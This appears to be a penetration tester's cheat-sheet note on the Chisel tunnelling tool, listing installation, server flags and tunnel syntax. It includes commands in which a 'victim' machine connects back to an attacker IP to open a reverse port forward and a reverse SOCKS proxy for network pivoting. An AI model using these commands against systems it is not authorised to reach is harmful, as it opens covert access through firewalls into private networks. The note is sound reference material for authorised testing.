🛠️ Chisel

Installation

go install github.com/jpillora/chisel@latest

Common Flags

Chisel is a fast TCP/UDP tunnel, transported over HTTP, and secured via SSH. Used mostly for bypassing firewalls, port forwarding, and network pivoting.

Chisel operates in two primary modes:

  • Server: Runs on the machine you want to connect to (or route traffic through).
  • Client: Runs on the machine you are connecting from.
FlagDescription
-p, --portThe port the server listens on (Default: 8080).
--reverseCrucial: Allows clients to specify reverse port forwarding.
--socks5Enables the internal SOCKS5 proxy server.
--backendSets an HTTP server to proxy normal requests to.
-vEnables verbose logging.

Client syntax generally follows this structure:

chisel client [options] <server-address> <tunnels>
Tunnel SyntaxDescription
L:local_port:remote_host:remote_portLocal Forward: Listens on your client, sends traffic to the server.
R:server_port:remote_host:remote_portRemote Forward: Listens on the server, sends traffic back to the client.
R:socksReverse SOCKS: Opens a SOCKS5 proxy on the server, routed through the client.
socksForward SOCKS: Opens a SOCKS5 proxy on the client, routed through the server.

Common Commands

Reverse Port Forwarding

Attacker Machine:

chisel server -p 8000 --reverse

Victim Machine:

chisel client [Attacker_IP]:8000 R:[Attacker_Port]:[Victim_Target_IP]:[Victim_Target_Port]

SOCKS5 Proxy

Attacker Machine:

chisel server -p 8000 --reverse

Victim Machine:

chisel client [Attacker-IP]:8000 R:socks
TABLE creation_date AS "Created" 
FROM "05 - Content" 
WHERE contains(tools, this.file.link) AND contains(tags, "🚩") 
SORT file.name ASC